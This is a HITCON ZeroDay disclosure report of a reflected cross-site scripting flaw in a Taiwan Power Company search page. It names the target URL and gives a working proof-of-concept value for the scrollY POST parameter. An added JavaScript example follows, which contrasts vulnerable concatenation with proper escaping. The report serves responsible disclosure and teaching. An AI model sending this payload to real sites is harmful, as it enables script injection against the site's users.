[Bounty] 台灣電力公司 Reflected Cross-Site Scripting - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-01003
  • Vendor: 台灣電力公司
  • Title: [Bounty] 台灣電力公司 Reflected Cross-Site Scripting
  • Introduction: Reflected Cross-Site Scripting

Processing Status

Current Status

Public
Last Update : 2021/02/06
  • New submission
  • Reviewed
  • Vendor notified
  • Fix status not reported
  • Not retested
  • Public

Processing History

  • 2020/12/07 19:09:24 : New submission (status updated by Hzllaga)
  • 2020/12/08 12:40:02 : New submission (status updated by Hzllaga)
  • 2020/12/09 18:02:01 : New submission (status updated by Hzllaga)
  • 2020/12/10 16:23:37 : Fix in progress (status updated by the HITCON ZeroDay service team)
  • 2021/02/06 03:00:05 : Public (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2020-01003
  • Reporter: haihai (Hzllaga)
  • Risk: Low
  • Type: Reflected Cross-Site Scripting

References

An attacker can use this vulnerability to steal a user's identity, or to carry out attacks such as injecting malicious code or redirecting users.

Vulnerability description: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Prevention principles: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Defense bypass techniques: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(The information in this field is generated automatically by the system based on the vulnerability category, as reference material.)

Related URL

https://csr.taipower.com.tw/TC/search.aspx

Description

I found this yesterday, but halfway through, the site went 503 and still hasn't come back up, so I'm submitting directly with yesterday's screenshots:

https://csr.taipower.com.tw/TC/search.aspx?q=%u6c38%u7e8c%u7e3e%u6548#gsc.tab=0

POST (scrollY parameter):

__VIEWSTATE=[long base64 value omitted]&__VIEWSTATEGENERATOR=6F43CF45&ctl00%24nav1%24m_googleQuery=%E8%AB%8B%E8%BC%B8%E5%85%A5%E9%97%9C%E9%8D%B5%E5%AD%97&scrollY=oykpyxje'-alert(document.domain)-'

2020/12/08 The site is back up; adding new screenshots:
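The PoC value above ends the current single-quoted JavaScript string and starts a new one, which is why a value reflected into a script string must be JavaScript-encoded, not merely quoted. The following is an added example, not code from the report or from the vendor's site; the `window.scrollTo(0, '...')` template is an assumption about how a scrollY value might be embedded, and the check function is a hypothetical helper for illustrating the break-out.

```javascript
// Added example (not from the report or the vendor's site). The page template
// below is an ASSUMPTION: the real page source is not part of the report.

// Naive (vulnerable) embedding: the untrusted value is concatenated straight
// into a single-quoted JavaScript string literal.
function renderNaive(scrollY) {
  return "window.scrollTo(0, '" + scrollY + "');";
}

// Hardened embedding: JSON.stringify yields a double-quoted literal with
// backslash escapes for quotes, backslashes and control characters. On top
// of that, escape characters that matter when the script sits inside an
// HTML <script> block: '<' and '>' (so "</script>" cannot close the block),
// '&' (HTML attribute contexts) and the JS line terminators U+2028/U+2029.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}
function renderSafe(scrollY) {
  return "window.scrollTo(0, " + jsStringLiteral(scrollY) + ");";
}

// Hypothetical check: take the argument text between "scrollTo(0, " and the
// trailing ");" and verify it is exactly ONE string literal, i.e. the
// untrusted data never leaves the quotes. Backslash escapes are skipped.
function argumentIsSingleStringLiteral(rendered) {
  const prefix = "window.scrollTo(0, ", suffix = ");";
  if (!rendered.startsWith(prefix) || !rendered.endsWith(suffix)) return false;
  const arg = rendered.slice(prefix.length, -suffix.length);
  const quote = arg[0];
  if (quote !== "'" && quote !== '"') return false;
  for (let i = 1; i < arg.length; i++) {
    if (arg[i] === "\\") { i++; continue; }            // skip the escaped char
    if (arg[i] === quote) return i === arg.length - 1; // closing quote must be last
  }
  return false; // unterminated literal
}

// The report's PoC value, used as sample input.
const payload = "oykpyxje'-alert(document.domain)-'";
// renderNaive(payload) fails the check; renderSafe(payload) passes it.
```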
